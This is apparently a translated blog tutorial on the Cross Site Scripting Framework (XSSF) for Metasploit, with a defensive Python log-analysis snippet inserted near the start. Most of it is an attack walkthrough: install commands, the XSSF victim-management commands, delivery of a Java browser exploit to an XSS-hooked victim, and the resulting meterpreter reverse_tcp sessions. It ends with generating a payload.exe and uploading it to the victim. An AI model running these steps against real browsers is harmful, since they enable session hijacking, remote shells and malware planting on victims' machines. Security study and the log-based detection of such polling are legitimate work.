XSSF - Cross Site Scripting Framework

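        The Cross Site Scripting Framework (XSSF) is a security toolset designed to quickly discover XSS vulnerabilities in websites. The project is meant to demonstrate the XSS vulnerabilities present in a website and how they are exploited.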

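        XSSF allows a communication channel to be established with the target browser (one affected by an XSS vulnerability) in order to carry out attacks. Users are free to choose from the existing attack modules to run against the target browser.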

        (My English is too poor and I couldn't be bothered to translate it; once it is converted to English everyone should be able to follow.)
        The XSSF framework lets you manage victims of XSS attacks and keeps a persistent connection with them through a JavaScript "loop", which sends reverse requests at defined intervals in order to execute exploits against the victim.
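From the defender's side, the fixed-interval polling loop described above is visible in web-proxy logs. The following is an added example, not part of XSSF or the original post: it flags client/host pairs whose request gaps are nearly constant. The log format, the host names and the thresholds are assumptions made for the illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed proxy log, one request per line:
# "<epoch_seconds> <client_ip> <dest_host> <path>" (format is an assumption)
SAMPLE_LOG = """\
1000 10.0.0.5 collector.example /poll
1002 10.0.0.5 intranet.example /home
1003 10.0.0.5 intranet.example /style.css
1005 10.0.0.5 collector.example /poll
1010 10.0.0.5 collector.example /poll
1012 10.0.0.9 collector.example /index
1016 10.0.0.5 collector.example /poll
1021 10.0.0.5 collector.example /poll
1026 10.0.0.5 collector.example /poll
1031 10.0.0.5 collector.example /poll
1040 10.0.0.5 intranet.example /reports
1041 10.0.0.5 intranet.example /reports.js
1100 10.0.0.5 intranet.example /reports/7
1190 10.0.0.5 intranet.example /logout
1200 10.0.0.5 intranet.example /login
malformed line
"""

def find_polling(log_text, min_requests=6, max_jitter=0.1):
    """Return [(client, host, mean_gap_seconds)] for machine-timed request series."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue                      # skip truncated or malformed lines
        try:
            series[(parts[1], parts[2])].append(float(parts[0]))
        except ValueError:
            continue                      # timestamp field is not numeric
    hits = []
    for (client, host), stamps in sorted(series.items()):
        if len(stamps) < min_requests:
            continue                      # too few requests to judge regularity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Coefficient of variation: human browsing is bursty (high value),
        # a timer-driven loop is nearly constant (low value).
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits.append((client, host, round(avg, 2)))
    return hits
```

Legitimate pollers such as webmail or chat widgets also match this pattern, so results need an allowlist and thresholds tuned to the local proxy data.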

        

        To use XSSF in Metasploit you first need an application that is vulnerable to XSS. To test and improve your web application security skills, there is a project called DVWA (Damn Vulnerable Web Application): a PHP/MySQL application with a number of vulnerabilities deliberately enabled, which lets a security professional interact with it and understand the attacks that are possible against web applications.


        XSSF provides a powerful, documented API that facilitates the development of modules and attacks. In addition, its integration into the Metasploit Framework lets users easily launch MSF browser-based exploits through an XSS vulnerability.

        Exploiting an XSS bug in the victim's browser can mean browsing the website from the attacker's browser using the victim's logged-in session. In most cases, simply stealing the victim's cookie is sufficient to do this.

        However, in a few cases (intranet, network tool portals, etc.), the cookie will not be useful to an external attacker. That is why XSSF Tunnel was created: to help the attacker browse the affected domain using the victim's session.

        With XSS, a tunnel can be created that lets us connect through the victim from a web browser. The basic idea is a tunnel that acts as a proxy for communication between the application with the exploited XSS vulnerability and the attacker, passing through the victim. In this way, additional attacks can be run without revealing the attacker's identity, using the victim's identity instead.

        The new MSF version 4.6.0-dev is supported on:

    • Backtrack 5R3

    • Ubuntu 12.04

    • Kali 1.0

    • Windows 7

    XSS (Cross Site Scripting) vulnerabilities

    • Indirect (Reflected) Cross Site Scripting: Reflective XSS

    • Direct (Persistent) Cross Site Scripting

    Manual with examples: "XSS for fun and profit"

        It allows:

            Stealing cookies

            Executing commands (via JavaScript)

            Executing Denial of Service (DDoS) attacks

    XSSF with Metasploit

    msfupdate 
      
    cd /opt/metasploit/apps/pro/msf3 
      
    svn export http://xssf.googlecode.com/svn/trunk ./ --force 
      
    msfconsole
    msf > load xssf Port=80
    msf > help xssf

    Result of the available commands:

    • xssf_active_victims Shows active victims.

    • xssf_add_auto_attack Adds a new automated attack (launched automatically when a victim connects).

    • xssf_auto_attacks Shows XSSF automated attacks.

    • xssf_banner Prints the XSS Framework banner.

    • xssf_clean_victims Cleans victims in the database (removes waiting attacks).

    • xssf_exploit Launches and delivers a module (running in one of its jobs) to a given victim.

    • xssf_information Shows information about a given victim.

    • xssf_log Shows the log with a given ID.

    • xssf_logs Shows the logs for a given victim.

    • xssf_remove_auto_attack Removes an automated attack.

    • xssf_remove_victims Removes victims from the database.

    • xssf_restore_state Restores the XSSF state (victims, logs, etc.) from the input file.

    • xssf_save_state Saves the XSSF state (victims, logs, etc.) to the output file.

    • xssf_servers Shows all the attack servers in use.

    • xssf_tunnel Provides a tunnel between attacker and victim.

    • xssf_urls Lists the useful URLs provided by XSSF.

    • xssf_victims Shows all victims.

    Example of a victim using Internet Explorer 7 and a vulnerable version of Java in Windows XP.

    xssf_victims

        1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

            [..] 
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86 
            [..]
            

    use exploit/multi/browser/java_atomicreferencearray    
    set PAYLOAD java/meterpreter/reverse_tcp
    set SRVHOST 192.168.23.200
    set URIPATH xssf
    set LHOST 192.168.23.200
    exploit -j
    jobs

        Jobs
        ====
        Id  Name
        --  ----
        0   Exploit: multi/browser/java_atomicreferencearray
        

    xssf_exploit 1 0

        [*] Searching Metasploit launched module with JobID = '0'...
        [+] A running exploit exists: 'Exploit: multi/browser/java_atomicreferencearray'
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code 'Exploit: multi/browser/java_atomicreferencearray' sent to victim '1'
        [+] Remaining victims to attack: NONE

        

    show sessions

        Active sessions
        ===============
        Id  Type                   Information          Connection
        --  ----                   -----------          ----------
        1   meterpreter java/java  victime @ Victim-PC  192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

    ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe
    use exploit/multi/handler
    exploit -j
    upload /opt/metasploit/apps/pro/msf3/payload.exe c
    background
    sessions -i 1

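    PS: Writing articles isn't easy, and translating is pretty painful too. Even though this was only translating into English, I truly admire those master translators!

    via: Elhacker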